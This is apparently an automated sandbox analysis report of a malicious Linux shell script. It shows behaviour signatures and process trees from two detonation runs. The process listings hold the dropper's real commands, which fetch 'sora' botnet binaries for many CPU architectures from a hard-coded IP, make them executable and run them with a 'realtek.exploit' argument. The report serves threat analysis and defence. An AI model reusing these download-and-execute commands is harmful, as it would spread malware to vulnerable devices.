Analysis Overview
SHA256
bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1
Threat Level: Shows suspicious behavior
The file bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh was found to show suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-18 02:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
10s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh config-err-Pzue4d netplan_4c_7ljym robben snap-private-tmp ssh-oGhne8CwRJKN systemd-private-f3a488b8bf9547eaa229b65a3b571a72-bolt.service-GM5cDx systemd-private-f3a488b8bf9547eaa229b65a3b571a72-colord.service-8CgRXE systemd-private-f3a488b8bf9547eaa229b65a3b571a72-ModemManager.service-ql0EjV systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-resolved.service-wf84C9 systemd-private-f3a488b8bf9547eaa229b65a3b571a72-systemd-timedated.service-sZpHya]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| NL | 93.123.85.141:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| GB | 195.181.164.19:443 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.39:443 | 1527653184.rsc.cdn77.org | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
debian9-armhf-20240418-en
Max time kernel
20s
Max time network
22s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | /tmp/robben | /tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh | N/A |
Processes
/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh
[/tmp/bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86]
/bin/cat
[cat sora.x86]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mips]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mips]
/bin/cat
[cat sora.mips]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.x86_64]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.x86_64]
/bin/cat
[cat sora.x86_64]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i468]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i468]
/bin/cat
[cat sora.i468]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.i686]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.i686]
/bin/cat
[cat sora.i686]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.mpsl]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.mpsl]
/bin/cat
[cat sora.mpsl]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm4]
/bin/cat
[cat sora.arm4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm5]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm5]
/bin/cat
[cat sora.arm5]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm6]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm6]
/bin/cat
[cat sora.arm6]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.arm7]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.arm7]
/bin/cat
[cat sora.arm7]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc]
/bin/cat
[cat sora.ppc]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.ppc440fp]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.ppc440fp]
/bin/cat
[cat sora.ppc440fp]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.m68k]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.m68k]
/bin/cat
[cat sora.m68k]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
/usr/bin/wget
[wget http://93.123.85.141/bins/sora.sh4]
/usr/bin/curl
[curl -O http://93.123.85.141/bins/sora.sh4]
/bin/cat
[cat sora.sh4]
/bin/chmod
[chmod +x bd11bece7e3e7f7e3cc470ce5280b205021fa623898266035a0bffd9ba17c6d1.sh robben systemd-private-a5cde2fb37184d9bba02bbcda0baabd6-systemd-timedated.service-o8oJRg]
/tmp/robben
[./robben realtek.exploit]
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
| NL | 93.123.85.141:80 | | tcp |
Files
memory/760-1-0xb671b000-0xb672c044-memory.dmp
memory/801-2-0xb66b5000-0xb66c6044-memory.dmp
memory/828-3-0xb6734000-0xb6745044-memory.dmp
memory/828-4-0xb669a000-0xb66ab044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-18 02:36
Reported
2024-10-18 02:39
Platform
